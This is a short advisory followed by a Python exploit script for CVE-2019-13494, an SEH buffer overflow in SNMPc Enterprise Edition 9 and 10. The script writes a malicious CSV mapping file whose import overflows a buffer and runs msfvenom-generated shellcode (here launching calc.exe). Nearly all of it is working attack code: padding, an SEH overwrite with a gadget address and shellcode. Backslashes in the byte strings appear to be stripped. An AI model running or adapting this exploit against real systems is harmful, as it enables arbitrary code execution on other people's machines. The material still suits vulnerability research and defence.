SNMPc Enterprise Edition versions 9 and 10 suffer from a mapping filename buffer overflow vulnerability.

MD5 | 109af1e27d2b7507c41e3905ac72c086

#!/usr/bin/python
# -*- coding: utf-8 -*-

#--------------------------------------------------------------------#
# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Date: 11 July 2019 #
# Exploit Author: @xerubus | mogozobo.com #
# Vendor Homepage: https://www.castlerock.com/ #
# Software Linke: https://www.castlerock.com/products/snmpc/ #
# Version: Enterprise Editioin 9 & 10 #
# Tested on: Windows 7 #
# CVE-ID: CVE-2019-13494 #
# Full write-up: https://www.mogozobo.com/?p=3534 #
#--------------------------------------------------------------------#
import sys, os
os.system('clear')

print("""
_ _
___ (~ )( ~)
/ _ / /
| D_ ] / -= SNMPc_Mapping_BOF by @xerubus =-
| D _]/ -= We all have something to hide =-
___/ / / \
(_ )( _)
@Xerubus
""")

filename="evilmap.csv"
junk = "A" * 2064
nseh = "xebx07x90x90" # short jmp to 0018f58d xebx07x90x90
seh = "x05x3cx0ex10" # 0x100e3c05 ; pop esi # pop edi # ret (C:program files (x86)snmpc network managerCRDBAPI.dll)

# Pre-padding of mapping file. Note mandatory trailing character return.
pre_padding = (
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
""Root Subnet","Subnet","","","","2","000=Unknown","","auto.ico","","2","Square","(NULL)","(0,0)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","0","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""n"
""")

# Post-padding of mapping file. Note mandatory trailing character return.
post_padding = (
"","Device","127.0.0.1","1.3.6.1.4.1.29671.2.107","","3","000=Unknown","000=Unknown","auto.ico","","2","Square","Root Subnet(2)","(-16,-64)","N/A","True","auto.exe","00 00 00 00 00 00","127.0.0.1","30","2","2","","0","=","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""n")

# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "x00x0ax0d" -f c
shellcode = (
"xdaxccxd9x74x24xf4xbaxd9xa1x94x48x5fx2bxc9xb1"
"x31x31x57x18x83xc7x04x03x57xcdx43x61xb4x05x01"
"x8ax45xd5x66x02xa0xe4xa6x70xa0x56x17xf2xe4x5a"
"xdcx56x1dxe9x90x7ex12x5ax1ex59x1dx5bx33x99x3c"
"xdfx4excex9exdex80x03xdex27xfcxeexb2xf0x8ax5d"
"x23x75xc6x5dxc8xc5xc6xe5x2dx9dxe9xc4xe3x96xb3"
"xc6x02x7bxc8x4ex1dx98xf5x19x96x6ax81x9bx7exa3"
"x6ax37xbfx0cx99x49x87xaax42x3cxf1xc9xffx47xc6"
"xb0xdbxc2xddx12xafx75x3axa3x7cxe3xc9xafxc9x67"
"x95xb3xccxa4xadxcfx45x4bx62x46x1dx68xa6x03xc5"
"x11xffxe9xa8x2ex1fx52x14x8bx6bx7ex41xa6x31x14"
"x94x34x4cx5ax96x46x4fxcaxffx77xc4x85x78x88x0f"
"xe2x77xc2x12x42x10x8bxc6xd7x7dx2cx3dx1bx78xaf"
"xb4xe3x7fxafxbcxe6xc4x77x2cx9ax55x12x52x09x55"
"x37x31xccxc5xdbx98x6bx6ex79xe5")


print "[+] Building payload.."
payload = "x90" * 10 + shellcode
print "[+] Creating buffer.."
buffer = pre_padding + junk + nseh + seh + payload + "x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!nn"